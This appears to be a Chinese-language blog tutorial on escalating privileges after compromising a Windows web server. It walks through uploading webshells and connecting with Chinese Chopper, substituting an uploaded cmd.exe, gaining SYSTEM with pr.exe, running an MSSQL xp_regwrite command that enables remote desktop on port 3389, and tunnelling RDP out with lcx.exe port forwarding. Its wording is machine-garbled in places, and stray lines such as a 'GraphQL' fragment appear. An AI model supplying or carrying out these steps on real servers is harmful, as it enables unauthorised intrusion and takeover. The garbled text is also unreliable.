---- 网易云热评

一、一样平常脚本所处的权限

1、asp/php 匿名权限

jsp权限判断某教程进修笔记一20权限晋升 GraphQL

2、aspx user权限

3、jsp 系统权限

二、不同脚本,权限也不同

1、上传普通一句话木马,然后用菜刀连接

2、进入终端,输入命令

3、我们上传一个大马,访问

4、输入命令,可以正常实行

三、cmd无法实行

1、上传一个大马,访问

2、进入cmd命令界面,创造不能实行

3、找一个可读写目录,上传本地的cmd.exe

4、把路径修正为我们上传的路径,实行命令

四、PR提权

一、实行whoami获取权限

二、上传pr.exe,重新获取权限,直接便是system权限

五、MSSQL提权

1、打开sqltools,输入ip、端口、用户名、密码、数据库名,然后点击连接,提示连接成功

2、dos命令可以成功实行

3、连接3389提示缺点

4、实行下面命令,打开3389

exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

5、连续连接3389端口

内网

六、端口转发

1、将lcx.exe上传到做事器,运行

lcx.exe -slave 192.168.171.128(外网) 2222 127.0.0.1(内网) 3389

2、在本地运行

lcx.exe -listen 1111 2222

3、打开远程桌面连接,输入127.0.0.1:2222,成功连接

禁止造孽,后果自大

欢迎关注"大众年夜众号:web安全工具库